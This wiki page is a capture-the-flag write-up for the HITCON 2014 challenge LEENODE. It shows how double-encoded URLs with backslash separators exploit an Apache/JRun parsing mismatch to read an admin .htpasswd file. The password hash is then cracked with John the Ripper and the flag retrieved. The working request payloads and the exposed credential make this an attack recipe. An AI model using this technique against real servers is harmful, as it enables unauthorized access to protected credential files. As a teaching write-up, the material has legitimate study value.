Login
Immutable PageDiscussionInfoAttachments
CTF/Writeup/HITCON2014/LEENODE

MMA

LEENODE

  1. Perhaps, what we need to do is to access to /admin/
  2. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
  3. *.jsp was forwarded to JRun server.
  4. I found a vulnerability information of JRun
  5. http://203.66.57.98/a;.jsp was 500 Internal Server Error. It is interesting. by Apache?

  6. I tried to escape the URL for Apache; http://203.66.57.98/a%253b.jsp was /a and 404 Error by JRun. It is very interesting.

  7. Can I get /.htaccess or /admin/.htaccess? http://203.66.57.98/.htaccess%253b.jsp, http://203.66.57.98/admin/.htaccess%253b.jsp: Answer is no. These are blocked by Apache. We need more tricks.

  8. Then, I found that JRun recognized backslash as directory separator (for Windows?). http://203.66.57.98/.%5Ca%253b.jsp was handled as /a by JRun.

  9. Finally, I got the /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp and /admin/.htpasswd via http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp.

    AuthName "Restricted Area" 
    AuthType Basic 
    AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd 
    AuthGroupFile /dev/null 
    require valid-user
    hitc0n_1een0de:nlGc3XNhkrL1o
  10. Use John. The password was ktw2z.

    % john htpasswd
    ktw2z            (hitc0n_1een0de)
    guesses: 1  time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014)  c/s: 5319K  trying: ktkcK - kk4iT
  11. There was the flag on http://203.66.57.98/admin/thefl4g.txt.

    The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}

CTF/Writeup/HITCON2014/LEENODE (last edited 2014-08-19 03:06:33 by ytoku)